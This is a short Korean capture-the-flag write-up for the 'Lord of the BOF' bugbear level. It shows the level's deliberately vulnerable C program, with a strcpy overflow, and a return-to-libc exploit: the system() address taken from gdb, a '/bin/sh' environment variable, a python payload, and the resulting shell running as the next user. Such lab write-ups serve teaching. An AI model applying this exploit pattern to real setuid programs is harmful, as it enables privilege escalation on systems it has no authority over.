LOB darkknight => bugbear
문제
[darkknight@localhost darkknight]$ cat bugbear.c
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack betrayed you!!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}음 RTL 문제다.
풀이
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) system 주소를 알아내고
[darkknight@localhost tmp]$ export bin="/bin/sh"환경변수에 /bin/sh 문자열 올려주고
[darkknight@localhost tmp]$ ./zugbear
bin address is 0xbffffef0[darkknight@localhost tmp]$
[darkknight@localhost tmp]$ ./bugbear `python -c "print 'A'*44 + '\xe0\x8a\x05\x40' + 'AAAA' + '\xf0\xfe\xff\xbf'"`환경변수 주소 알아내서 공격하면 된다.
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)